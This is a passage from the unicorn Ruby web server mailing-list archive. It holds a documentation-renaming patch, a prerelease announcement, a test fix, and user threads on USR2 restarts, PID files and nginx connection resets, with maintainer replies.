 == Features
 
@@ -15,9 +15,9 @@ both the the request and response in between \Unicorn and slow clients.
 * Compatible with Ruby 1.9.3 and later.
   unicorn 4.8.x will remain supported for Ruby 1.8 users.
 
-* Process management: \Unicorn will reap and restart workers that
+* Process management: unicorn will reap and restart workers that
   die from broken apps.  There is no need to manage multiple processes
-  or ports yourself.  \Unicorn can spawn and manage any number of
+  or ports yourself.  unicorn can spawn and manage any number of
   worker processes you choose to scale to your backend.
 
 * Load balancing is done entirely by the operating system kernel.
@@ -33,11 +33,11 @@ both the the request and response in between \Unicorn and slow clients.
 * Builtin reopening of all log files in your application via
   USR1 signal.  This allows logrotate to rotate files atomically and
   quickly via rename instead of the racy and slow copytruncate method.
-  \Unicorn also takes steps to ensure multi-line log entries from one
+  unicorn also takes steps to ensure multi-line log entries from one
   request all stay within the same file.
 
 * nginx-style binary upgrades without losing connections.
-  You can upgrade \Unicorn, your entire application, libraries
+  You can upgrade unicorn, your entire application, libraries
   and even your Ruby interpreter without dropping clients.
 
 * before_fork and after_fork hooks in case your application
@@ -60,15 +60,15 @@ both the the request and response in between \Unicorn and slow clients.
 
 == License
 
-\Unicorn is copyright 2009 by all contributors (see logs in git).
+unicorn is copyright 2009 by all contributors (see logs in git).
 It is based on Mongrel 1.1.5.
 Mongrel is copyright 2007 Zed A. Shaw and contributors.
 
-\Unicorn is licensed under (your choice) of the GPLv2 or later
+unicorn is licensed under (your choice) of the GPLv2 or later
 (GPLv3+ preferred), or Ruby (1.8)-specific terms.
 See the included LICENSE file for details.
 
-\Unicorn is 100% Free Software.
+unicorn is 100% Free Software.
 
 == Install
 
@@ -108,17 +108,17 @@ In RAILS_ROOT, run:
 
   unicorn_rails
 
-\Unicorn will bind to all interfaces on TCP port 8080 by default.
+unicorn will bind to all interfaces on TCP port 8080 by default.
 You may use the +--listen/-l+ switch to bind to a different
 address:port or a UNIX socket.
 
 === Configuration File(s)
 
-\Unicorn will look for the config.ru file used by rackup in APP_ROOT.
+unicorn will look for the config.ru file used by rackup in APP_ROOT.
 
-For deployments, it can use a config file for \Unicorn-specific options
+For deployments, it can use a config file for unicorn-specific options
 specified by the +--config-file/-c+ command-line switch.  See
-Unicorn::Configurator for the syntax of the \Unicorn-specific options.
+Unicorn::Configurator for the syntax of the unicorn-specific options.
 The default settings are designed for maximum out-of-the-box
 compatibility with existing applications.
 
@@ -130,7 +130,7 @@ supported.  Run `unicorn -h` to see command-line options.
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and we'll try our best to fix it.
 
-\Unicorn is designed to only serve fast clients either on the local host
+unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
 regarding this.
 
@@ -140,6 +140,6 @@ All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
 information on the {mailing list}[mailto:unicorn-public@bogomips.org].
 
-For the latest on \Unicorn releases, you may also finger us at
+For the latest on unicorn releases, you may also finger us at
 unicorn@bogomips.org or check our NEWS page (and subscribe to our Atom
 feed).
diff --git a/Sandbox b/Sandbox
index a6c3fe7..997b92f 100644
--- a/Sandbox
+++ b/Sandbox
@@ -1,4 +1,4 @@
-= Tips for using \Unicorn with Sandbox installation tools
+= Tips for using unicorn with Sandbox installation tools
 
 Since unicorn includes executables and is usually used to start a Ruby
 process, there are certain caveats to using it with tools that sandbox
diff --git a/TUNING b/TUNING
index 6a6d7db..247090b 100644
--- a/TUNING
+++ b/TUNING
@@ -1,10 +1,10 @@
-= Tuning \Unicorn
+= Tuning unicorn
 
-\Unicorn performance is generally as good as a (mostly) Ruby web server
+unicorn performance is generally as good as a (mostly) Ruby web server
 can provide.  Most often the performance bottleneck is in the web
 application running on Unicorn rather than Unicorn itself.
 
-== \Unicorn Configuration
+== unicorn Configuration
 
 See Unicorn::Configurator for details on the config file format.
 +worker_processes+ is the most-commonly needed tuning parameter.
@@ -14,7 +14,7 @@ See Unicorn::Configurator for details on the config file format.
 * worker_processes should be scaled to the number of processes your
   backend system(s) can support.  DO NOT scale it to the number of
   external network clients your application expects to be serving.
-  \Unicorn is NOT for serving slow clients, that is the job of nginx.
+  unicorn is NOT for serving slow clients, that is the job of nginx.
 
 * worker_processes should be *at* *least* the number of CPU cores on
   a dedicated server (unless you do not have enough memory).
@@ -58,7 +58,7 @@ See Unicorn::Configurator for details on the config file format.
 * UNIX domain sockets are slightly faster than TCP sockets, but only
   work if nginx is on the same machine.
 
-== Other \Unicorn settings
+== Other unicorn settings
 
 * Setting "preload_app true" can allow copy-on-write-friendly GC to
   be used to save memory.  It will probably not work out of the box with
diff --git a/examples/nginx.conf b/examples/nginx.conf
index a68fe6f..0583c1f 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -1,5 +1,5 @@
 # This is example contains the bare mininum to get nginx going with
-# Unicorn or Rainbows! servers.  Generally these configuration settings
+# unicorn servers.  Generally these configuration settings
 # are applicable to other HTTP application servers (and not just Ruby
 # ones), so if you have one working well for proxying another app
 # server, feel free to continue using it.
@@ -44,8 +44,8 @@ http {
   # click tracking!
   access_log /path/to/nginx.access.log combined;
 
-  # you generally want to serve static files with nginx since neither
-  # Unicorn nor Rainbows! is optimized for it at the moment
+  # you generally want to serve static files with nginx since
+  # unicorn is not and will never be optimized for it
   sendfile on;
 
   tcp_nopush on; # off may be better for *some* Comet/long-poll stuff
@@ -67,10 +67,10 @@ http {
              text/javascript application/x-javascript
              application/atom+xml;
 
-  # this can be any application server, not just Unicorn/Rainbows!
+  # this can be any application server, not just unicorn
   upstream app_server {
     # fail_timeout=0 means we always retry an upstream even if it failed
-    # to return a good HTTP response (in case the Unicorn master nukes a
+    # to return a good HTTP response (in case the unicorn master nukes a
     # single worker for timing out).
 
     # for UNIX domain socket setups:
@@ -132,12 +132,11 @@ http {
       # redirects, we set the Host: header above already.
       proxy_redirect off;
 
-      # set "proxy_buffering off" *only* for Rainbows! when doing
-      # Comet/long-poll/streaming.  It's also safe to set if you're using
-      # only serving fast clients with Unicorn + nginx, but not slow
-      # clients.  You normally want nginx to buffer responses to slow
-      # clients, even with Rails 3.1 streaming because otherwise a slow
-      # client can become a bottleneck of Unicorn.
+      # It's also safe to set if you're using only serving fast clients
+      # with unicorn + nginx, but not slow clients.  You normally want
+      # nginx to buffer responses to slow clients, even with Rails 3.1
+      # streaming because otherwise a slow client can become a bottleneck
+      # of unicorn.
       #
       # The Rack application may also set "X-Accel-Buffering (yes|no)"
       # in the response headers do disable/enable buffering on a
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index a5f069d..046ccb5 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -38,7 +38,7 @@ static VALUE set_maxhdrlen(VALUE self, VALUE len)
   return UINT2NUM(MAX_HEADER_LEN = NUM2UINT(len));
 }
 
-/* keep this small for Rainbows! since every client has one */
+/* keep this small for other servers (e.g. yahns) since every client has one */
 struct http_parser {
   int cs; /* Ragel internal state */
   unsigned int flags;
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 9fdcb8e..b0e6bd1 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -10,10 +10,10 @@ require 'kgio'
 # enough functionality to service web application requests fast as possible.
 # :startdoc:
 
-# \Unicorn exposes very little of an user-visible API and most of its
-# internals are subject to change.  \Unicorn is designed to host Rack
+# unicorn exposes very little of an user-visible API and most of its
+# internals are subject to change.  unicorn is designed to host Rack
 # applications, so applications should be written against the Rack SPEC
-# and not \Unicorn internals.
+# and not unicorn internals.
 module Unicorn
 
   # Raised inside TeeInput when a client closes the socket inside the
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index 02f6b6b..4da19bb 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 require 'logger'
 
-# Implements a simple DSL for configuring a \Unicorn server.
+# Implements a simple DSL for configuring a unicorn server.
 #
 # See http://unicorn.bogomips.org/examples/unicorn.conf.rb and
 # http://unicorn.bogomips.org/examples/unicorn.conf.minimal.rb
@@ -282,20 +282,19 @@ class Unicorn::Configurator
   #   Setting this to +true+ can make streaming responses in Rails 3.1
   #   appear more quickly at the cost of slightly higher bandwidth usage.
   #   The effect of this option is most visible if nginx is not used,
-  #   but nginx remains highly recommended with \Unicorn.
+  #   but nginx remains highly recommended with unicorn.
   #
   #   This has no effect on UNIX sockets.
   #
-  #   Default: +true+ (Nagle's algorithm disabled) in \Unicorn,
-  #   +true+ in Rainbows!  This defaulted to +false+ in \Unicorn
-  #   3.x
+  #   Default: +true+ (Nagle's algorithm disabled) in unicorn
+  #   This defaulted to +false+ in unicorn 3.x
   #
   # [:tcp_nopush => true or false]
   #
   #   Enables/disables TCP_CORK in Linux or TCP_NOPUSH in FreeBSD
   #
   #   This prevents partial TCP frames from being sent out and reduces
-  #   wakeups in nginx if it is on a different machine.  Since \Unicorn
+  #   wakeups in nginx if it is on a different machine.  Since unicorn
   #   is only designed for applications that send the response body
   #   quickly without keepalive, sockets will always be flushed on close
   #   to prevent delays.
@@ -303,7 +302,7 @@ class Unicorn::Configurator
   #   This has no effect on UNIX sockets.
   #
   #   Default: +false+
-  #   This defaulted to +true+ in \Unicorn 3.4 - 3.7
+  #   This defaulted to +true+ in unicorn 3.4 - 3.7
   #
   # [:ipv6only => true or false]
   #
@@ -387,12 +386,10 @@ class Unicorn::Configurator
   #   and +false+ or +nil+ is synonymous for a value of zero.
   #
   #   A value of +1+ is a good optimization for local networks
-  #   and trusted clients.  For Rainbows! and Zbatery users, a higher
-  #   value (e.g. +60+) provides more protection against some
-  #   denial-of-service attacks.  There is no good reason to ever
-  #   disable this with a +zero+ value when serving HTTP.
+  #   and trusted clients.  There is no good reason to ever
+  #   disable this with a +zero+ value with unicorn.
   #
-  #   Default: 1 retransmit for \Unicorn, 60 for Rainbows! 0.95.0\+
+  #   Default: 1
   #
   # [:accept_filter => String]
   #
@@ -401,8 +398,7 @@ class Unicorn::Configurator
   #   This enables either the "dataready" or (default) "httpready"
   #   accept() filter under FreeBSD.  This is intended as an
   #   optimization to reduce context switches with common GET/HEAD
-  #   requests.  For Rainbows! and Zbatery users, this provides
-  #   some protection against certain denial-of-service attacks, too.
+  #   requests.
   #
   #   There is no good reason to change from the default.
   #
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 0f97516..3dbfd3e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -7,8 +7,8 @@
 #
 # Users do not need to know the internals of this class, but reading the
 # {source}[http://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
-# is education for programmers wishing to learn how \Unicorn works.
-# See Unicorn::Configurator for information on how to configure \Unicorn.
+# is education for programmers wishing to learn how unicorn works.
+# See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
   # :stopdoc:
   attr_accessor :app, :timeout, :worker_processes,
diff --git a/lib/unicorn/socket_helper.rb b/lib/unicorn/socket_helper.rb
index 812ac53..df8315e 100644
--- a/lib/unicorn/socket_helper.rb
+++ b/lib/unicorn/socket_helper.rb
@@ -5,14 +5,12 @@ require 'socket'
 module Unicorn
   module SocketHelper
 
-    # internal interface, only used by Rainbows!/Zbatery
+    # internal interface
     DEFAULTS = {
       # The semantics for TCP_DEFER_ACCEPT changed in Linux 2.6.32+
       # with commit d1b99ba41d6c5aa1ed2fc634323449dd656899e9
-      # This change shouldn't affect Unicorn users behind nginx (a
-      # value of 1 remains an optimization), but Rainbows! users may
-      # want to use a higher value on Linux 2.6.32+ to protect against
-      # denial-of-service attacks
+      # This change shouldn't affect unicorn users behind nginx (a
+      # value of 1 remains an optimization).
       :tcp_defer_accept => 1,
 
       # FreeBSD, we need to override this to 'dataready' if we
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index c7784bd..2f8bfeb 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -1,7 +1,7 @@
 # -*- encoding: binary -*-
 
 require 'fcntl'
-module Unicorn::Util
+module Unicorn::Util # :nodoc:
 
 # :stopdoc:
   def self.is_log?(fp)
diff --git a/lib/unicorn/worker.rb b/lib/unicorn/worker.rb
index b3f8afe..6748a2f 100644
--- a/lib/unicorn/worker.rb
+++ b/lib/unicorn/worker.rb
@@ -3,8 +3,8 @@ require "raindrops"
 
 # This class and its members can be considered a stable interface
 # and will not change in a backwards-incompatible fashion between
-# releases of \Unicorn.  Knowledge of this class is generally not
-# not needed for most users of \Unicorn.
+# releases of unicorn.  Knowledge of this class is generally
+# not needed for most users of unicorn.
 #
 # Some users may want to access it in the before_fork/after_fork hooks.
 # See the Unicorn::Configurator RDoc for examples.
-- 
EW


^ permalink raw reply related	[relevance 2%]

* [ANN] unicorn 5.0.0.pre2 - another prerelease!
  @ 2015-07-06 21:41  9% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-06 21:41 UTC (permalink / raw)
  To: unicorn-public

There is a minor change: TCP socket options are now applied to
inherited sockets, and we have native support for inheriting sockets
from systemd (by emulating the sd_listen_fds(3) function).
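The sd_listen_fds(3) convention being emulated can be sketched in a few
lines of plain Ruby (illustrative only; the method name and shape here
are not unicorn's actual internals):

```ruby
# systemd passes listening sockets starting at file descriptor 3 and
# identifies them via the LISTEN_PID and LISTEN_FDS environment
# variables; a server emulating sd_listen_fds(3) checks both.
def sd_listen_fds(env = ENV)
  return [] unless env['LISTEN_PID'].to_i == Process.pid
  n = env['LISTEN_FDS'].to_i
  (3...(3 + n)).to_a # each FD can then be wrapped with Socket.for_fd
end
```

unicorn performs an equivalent check at startup so systemd-managed
sockets look just like ordinarily inherited ones.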

Dynamic changes in the application to Rack::Utils::HTTP_STATUS_CODES
are now supported, so you can use your own custom status lines.
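The effect can be pictured with a stand-in for the Rack status table
(plain-Ruby sketch; this is not unicorn's actual response code):

```ruby
# Stand-in for Rack::Utils::HTTP_STATUS_CODES, showing why runtime
# mutation works: the status line is built per response instead of
# being cached in frozen constants.
HTTP_STATUS_CODES = { 200 => 'OK', 404 => 'Not Found' }

def status_line(code)
  "HTTP/1.1 #{code} #{HTTP_STATUS_CODES[code] || code}\r\n"
end

HTTP_STATUS_CODES[200] = 'HI' # dynamic change, picked up immediately
status_line(200) # => "HTTP/1.1 200 HI\r\n"
```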

Ruby 2.2 and later is now favored for performance.
Optimizations by using constants which made sense in earlier
versions of Ruby are gone: so users of old Ruby versions
will see performance regressions.  Ruby 2.2 users should
see the same or better performance, and we have less code
as a result.

* doc: update some invalid URLs
* apply TCP socket options on inherited sockets
* reflect changes in Rack::Utils::HTTP_STATUS_CODES
* reduce constants and optimize for Ruby 2.2
* http_response: reduce size of multi-line header path
* emulate sd_listen_fds for systemd support
* test/unit/test_response.rb: compatibility with older test-unit

This also includes all changes in unicorn 5.0.0.pre1:

http://bogomips.org/unicorn-public/m/20150615225652.GA16164@dcvr.yhbt.net.html

-- 
EW

^ permalink raw reply	[relevance 9%]

* [PATCH] test/unit/test_response.rb: compatibility with older test-unit
@ 2015-07-05  0:31  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-07-05  0:31 UTC (permalink / raw)
  To: unicorn-public; +Cc: Eric Wong

assert_predicate really isn't that useful even if it seems
preferred in another project I work on.  Avoid having folks
download the latest test-unit if they're on an old version of
Ruby (e.g. 1.9.3) which bundled it.
---
 test/unit/test_response.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/test/unit/test_response.rb b/test/unit/test_response.rb
index 1e9d74a..0b14d59 100644
--- a/test/unit/test_response.rb
+++ b/test/unit/test_response.rb
@@ -94,7 +94,7 @@ class ResponseTest < Test::Unit::TestCase
     assert_equal "HTTP/1.1 200 HI\r\n", r.gets
     r.read # just drain the pipe
     pid, status = Process.waitpid2(pid)
-    assert_predicate status, :success?
+    assert status.success?, status.inspect
   ensure
     r.close
     w.close unless w.closed?
-- 
EW


^ permalink raw reply related	[relevance 4%]

* Is the environment preserved on USR2?
@ 2015-06-26 22:18  4% Bráulio Bhavamitra
  0 siblings, 0 replies; 200+ results
From: Bráulio Bhavamitra @ 2015-06-26 22:18 UTC (permalink / raw)
  To: unicorn-public

Hello,

I use the ruby environment variable RUBY_GC_MALLOC_LIMIT='90000000' to
start unicorn inside a init.d service and I get the impression that
when I run kill -USR2 `cat tmp/pids/unicorn.pid` in another shell this
variable is no longer used.

So does the new master started by USR2 preserve the environment from
the old master, or do the environment variables need to be set in the
shell where it is invoked?
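As a general POSIX/Ruby illustration (not an answer quoted from this
archive): environment variables survive exec(2), which is how unicorn's
USR2 re-exec starts the new master:

```ruby
require 'rbconfig'

# A variable set in this process is visible in a freshly exec'ed child,
# just as the old unicorn master's environment carries over on USR2.
ENV['RUBY_GC_MALLOC_LIMIT'] = '90000000'
inherited = IO.popen([RbConfig.ruby, '-e',
                      'print ENV["RUBY_GC_MALLOC_LIMIT"].to_s'], &:read)
inherited # => "90000000"
```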

cheers,
bráulio

-- 
"Fight for your ideology. Be one with your ideology. Live for your
ideology. Die for your ideology." P.R. Sarkar

EITA - Educação, Informação e Tecnologias para Autogestão
http://cirandas.net/brauliobo
http://eita.org.br

"Paramapurusha is my father and Parama Prakriti is my mother. The
universe is my home and we are all citizens of this cosmos. This
universe is the imagination of the Macrocosmic Mind, and all entities
are being created, preserved and destroyed in the phases of
extroversion and introversion of the cosmic imaginative flow. On the
personal level, when a person imagines something in their mind, at
that moment that person is the sole owner of what they imagine, and
no one else. When a mentally created human being walks through an
equally imagined cornfield, the imagined person does not own that
cornfield, for it belongs to the individual who is imagining it. This
universe was created in the imagination of Brahma, the Supreme Entity,
so the ownership of this universe lies with Brahma, and not with the
microcosms that were also created by Brahma's imagination. No property
of this world, mutable or immutable, belongs to any particular
individual; everything is the common patrimony of all."
The rest of the text is at
http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia

^ permalink raw reply	[relevance 4%]

* possible errors reading mailing list archives
@ 2015-04-07 23:22  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-04-07 23:22 UTC (permalink / raw)
  To: unicorn-public

If you hit any errors or truncated/corrupted responses when reading ML
archives at http://bogomips.org/unicorn-public/ it's probably because of
a bug in the new rack.hijack-based proxy in front of the prefork Apache2
instance hosting them.

Drop me (or this list) a plain-text mail with the URL(s) and any info
about your client/connection that's broken for you.

Previously, yahns used a synchronous (Rack, no-hijack) proxy
implemented in its extras/proxy_pass.rb file[2]

before:
  yahns:extras/proxy_pass.rb -> varnish -> mpm_prefork+mod_perl

after:
  yahns:lib/yahns/proxy_pass.rb -> varnish -> mpm_prefork+mod_perl

yahns mailing list archives with all the relevant commits are here:
http://yhbt.net/yahns-public/

In case the HTTP portion of the archives gets hosed, archives of the
mailing lists are still git-clonable with ssoma[1] (or just using
"git clone"):

	git://yhbt.net/yahns-public
	git://bogomips.org/unicorn-public

In case the server gets completely hosed by the yahns proxy_pass
changes, archives are still readable at:

	https://www.mail-archive.com/yahns-public@yhbt.net/
	https://www.mail-archive.com/unicorn-public@bogomips.org/

Finally, in case you haven't realized by now: unicorn has always been a
rip-off of the Apache(1|2) prefork design.  The major difference is that
the marketing of unicorn always focused on the shortcomings of the design :>

So any fully-buffering reverse proxy such as nginx or yahns/proxy_pass
which protects one preforking server implementation from slow clients
will protect another...

[1] http://ssoma.public-inbox.org/
[2] git clone git://yhbt.net/yahns

^ permalink raw reply	[relevance 4%]

* Re: nginx reverse proxy getting ECONNRESET
  2015-03-24 23:04  0%     ` Michael Fischer
@ 2015-03-24 23:23  0%       ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-03-24 23:23 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Michael Fischer <mfischer@zendesk.com> wrote:
> On Tue, Mar 24, 2015 at 10:59 PM, Eric Wong <e@80x24.org> wrote:
> > Another likely explanation might be you're not draining rack.input every
> > request, since unicorn does lazy reads off the socket to prevent
> > rejected uploads from wasting disk I/O[1]
> >
> > So you can send a bigger POST request with my example to maybe
> > reproduce the issue.
> >
> > [1] you can use the Unicorn::PrereadInput middleware to forcibly
> >     disable the lazy read:
> >     http://unicorn.bogomips.org/Unicorn/PrereadInput.html
> 
> Actually, these are quite large POST requests we're attempting to
> service (on the order of 4MB).  Can you elaborate on the mechanism in
> play here?

Unlike a lot of servers, unicorn will not attempt to buffer request
bodies on its own.  You'll need to actually process the POST request in
your app (via Rack/Rails/whatever accessing env["rack.input"]).

The PrereadInput middleware makes it behave like other servers
(at the cost of being slower if a request is worthless and rejected)

So there might be data sitting on the socket if your application
processing returns a response before it parsed the POST request.

In this case, the ECONNRESET messages are harmless and saves your
Ruby process from GC thrashing.

Actually, you can try setting up a Rack::Lobster instance and sending
it a giant POST request:

------------- config.ru --------------
require 'rack/lobster'
run Rack::Lobster.new
--------------------------------------
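If you would rather have unicorn drain the body up front, the
documented Unicorn::PrereadInput middleware can be enabled in config.ru
(sketch; MyApp is a placeholder for your application):

```ruby
# config.ru sketch: Unicorn::PrereadInput drains rack.input before the
# app runs, trading unicorn's lazy reads for the eager-buffering
# behavior of other servers.
require 'unicorn/preread_input'
use Unicorn::PrereadInput
run MyApp
```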

^ permalink raw reply	[relevance 0%]

* Re: nginx reverse proxy getting ECONNRESET
  2015-03-24 22:59  5%   ` Eric Wong
@ 2015-03-24 23:04  0%     ` Michael Fischer
  2015-03-24 23:23  0%       ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Michael Fischer @ 2015-03-24 23:04 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On Tue, Mar 24, 2015 at 10:59 PM, Eric Wong <e@80x24.org> wrote:
> Another likely explanation might be you're not draining rack.input every
> request, since unicorn does lazy reads off the socket to prevent
> rejected uploads from wasting disk I/O[1]
>
> So you can send a bigger POST request with my example to maybe
> reproduce the issue.
>
> [1] you can use the Unicorn::PrereadInput middleware to forcibly
>     disable the lazy read:
>     http://unicorn.bogomips.org/Unicorn/PrereadInput.html

Actually, these are quite large POST requests we're attempting to
service (on the order of 4MB).  Can you elaborate on the mechanism in
play here?

Thanks,

--Michael


^ permalink raw reply	[relevance 0%]

* Re: nginx reverse proxy getting ECONNRESET
  @ 2015-03-24 22:59  5%   ` Eric Wong
  2015-03-24 23:04  0%     ` Michael Fischer
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-24 22:59 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

Another likely explanation might be you're not draining rack.input every
request, since unicorn does lazy reads off the socket to prevent
rejected uploads from wasting disk I/O[1]

So you can send a bigger POST request with my example to maybe
reproduce the issue.

[1] you can use the Unicorn::PrereadInput middleware to forcibly
    disable the lazy read:
    http://unicorn.bogomips.org/Unicorn/PrereadInput.html

^ permalink raw reply	[relevance 5%]

* Re: On USR2, new master runs with same PID
  2015-03-12  1:45  4% ` Eric Wong
@ 2015-03-12  6:26  0%   ` Kevin Yank
  0 siblings, 0 replies; 200+ results
From: Kevin Yank @ 2015-03-12  6:26 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 5164 bytes --]

Thanks for your help, Eric!

> On 12 Mar 2015, at 12:45 pm, Eric Wong <e@80x24.org> wrote:
> 
> Kevin Yank <kyank@avalanche.com.au> wrote:
>> When I send USR2 to the master process (PID 19216 in this example), I
>> get the following in the Unicorn log:
>> 
>> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
>> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
>> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)
> 
> Nothing suspicious until the above line...

That’s right.

>> And when I check, indeed, there is now unicorn.pid and
>> unicorn.pid.oldbin, both containing 19216.
> 
> Any chance you have a process manager or something else creating the
> (non-.oldbin) pid file behind unicorn's back?

It’s possible; I’m using eye (https://github.com/kostya/eye) as a process monitor. I’m not aware of it writing .pid files for processes that self-daemonize like Unicorn, though. And once one of my servers “goes bad” (i.e. Unicorn starts failing to restart in response to a USR2), it does so 100% consistently until I stop and restart Unicorn entirely. Based on that, I don’t believe it’s a race condition where my process monitor is slipping in a new unicorn.pid file some of the time.

> Can you check your process table to ensure there's not multiple
> unicorn instances running off the same config and pid files, too?

As far as I can tell, I have some servers that have gotten themselves into this “USR2 restart fails” state, while others are working just fine. In both cases, the Unicorn process tree (as shown in htop) looks like this “at rest” (i.e. no deployments/restarts in progress):

unicorn master
`- unicorn master
`- unicorn worker[2]
|  `- unicorn worker[2]
`- unicorn worker[1]
|  `- unicorn worker[1]
`- unicorn worker[0]
   `- unicorn worker[0]

At first glance I’d definitely say it appears that I have two masters running from the same config files. However, there’s only one unicorn.pid file of course (the root process in the tree above), and when I try to kill -TERM the master process that doesn’t have a .pid file, the entire process tree exits. Am I misinterpreting the process table? Is this process list actually normal?

Thus far I’ve been unable to find any difference in state between a properly-behaving server and a misbehaving server, apart from the behaviour of the Unicorn master when it receives a USR2.

> Also, were there other activity (another USR2 or HUP) in the logs
> a few seconds beforehand?

No, didn’t see anything like that (and I was looking for it).

> What kind of filesystem / kernel is the pid file on?

EXT4 / Ubuntu Server 12.04 LTS

> A network FS or anything without the consistency guarantees provided
> by POSIX would not work for pid files.

Given my environment above, I should be OK, right?

> pid files are unfortunately prone to nasty race conditions,
> but I'm not sure what you're seeing happens very often.

This has been happening pretty frequently across multiple server instances, and again once it starts happening on an instance, it keeps happening 100% of the time (until I restart Unicorn completely). So it’s not a rare edge case.

> -------------------8<-------------------
>>  sleep 10
>> 
>>  old_pid = "#{server.config[:pid]}.oldbin"
>>  if File.exists?(old_pid) && server.pid != old_pid
>>    begin
>>      Process.kill("QUIT", File.read(old_pid).to_i)
>>    rescue Errno::ENOENT, Errno::ESRCH
>>      # someone else did our job for us
>>    end
>>  end
> -------------------8<-------------------
> 
> I'd get rid of that hunk starting with the "sleep 10" (at least while
> debugging this issue).

If I simply delete this hunk, I’ll have old masters left running on my servers because they’ll never get sent the QUIT signal. I can definitely remove it temporarily (and kill the old master myself) while debugging, though.

> If you did a USR2 previously, maybe it could
> affect the current USR2 upgrade process.  Sleeping so long in the master
> like that is pretty bad; it throws off timing and delays signal handling.

I’d definitely like to get rid of the sleep, as my restarts definitely feel slow. I’m not clear on what a better approach would be, though.

> That's a pretty fragile config and I regret ever including it in the
> example config files

Any better examples/docs you’d recommend I consult for guidance? Or is expecting to achieve a robust zero-downtime restart using before_fork/after_fork hooks unrealistic?

--
Kevin Yank
Chief Technology Officer, Avalanche Technology Group
http://avalanche.com.au/

ph: +61 4 2241 0083




^ permalink raw reply	[relevance 0%]

* Re: On USR2, new master runs with same PID
  @ 2015-03-12  1:45  4% ` Eric Wong
  2015-03-12  6:26  0%   ` Kevin Yank
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2015-03-12  1:45 UTC (permalink / raw)
  To: Kevin Yank; +Cc: unicorn-public

Kevin Yank <kyank@avalanche.com.au> wrote:
> Having recently migrated our Rails app to MRI 2.2.0 (which may or may
> not be related), we’re experiencing problems with our Unicorn
> zero-downtime restarts.
> 
> When I send USR2 to the master process (PID 19216 in this example), I
> get the following in the Unicorn log:
>
> I, [2015-03-11T23:47:33.992274 #6848]  INFO -- : executing ["/srv/ourapp/shared/bundle/ruby/2.2.0/bin/unicorn", "/srv/ourapp/current/config.ru", "-Dc", "/srv/ourapp/shared/config/unicorn.rb", {10=>#<Kgio::UNIXServer:/srv/ourapp/shared/sockets/unicorn.sock>}] (in /srv/ourapp/releases/a0e8b5df474ad5129200654f92a76af00a750f47)
> I, [2015-03-11T23:47:36.504235 #6848]  INFO -- : inherited addr=/srv/ourapp/shared/sockets/unicorn.sock fd=10
> /srv/ourapp/shared/bundle/ruby/2.2.0/gems/unicorn-4.8.1/lib/unicorn/http_server.rb:206:in `pid=': Already running on PID:19216 (or pid=/srv/ourapp/shared/pids/unicorn.pid is stale) (ArgumentError)

Nothing suspicious until the above line...

<snip>

> And when I check, indeed, there is now unicorn.pid and
> unicorn.pid.oldbin, both containing 19216.
> 
> What could cause this situation to arise?

Any chance you have a process manager or something else creating the
(non-.oldbin) pid file behind unicorn's back?

Can you check your process table to ensure there's not multiple
unicorn instances running off the same config and pid files, too?

Also, were there other activity (another USR2 or HUP) in the logs
a few seconds beforehand?

What kind of filesystem / kernel is the pid file on?
A network FS or anything without the consistency guarantees provided
by POSIX would not work for pid files.

pid files are unfortunately prone to nasty race conditions,
but I'm not sure what you're seeing happens very often.

Likewise, the check for stale Unix domain socket paths at startup is
inevitably racy, too, but the window is usually small enough to be
unnoticeable.  But yes, just in case, check the process table to make
sure there aren't multiple, non-related masters running on off the
same paths.

<snip>

> before_fork do |server, worker|
>   ActiveRecord::Base.connection.disconnect!

-------------------8<-------------------
>   sleep 10
> 
>   old_pid = "#{server.config[:pid]}.oldbin"
>   if File.exists?(old_pid) && server.pid != old_pid
>     begin
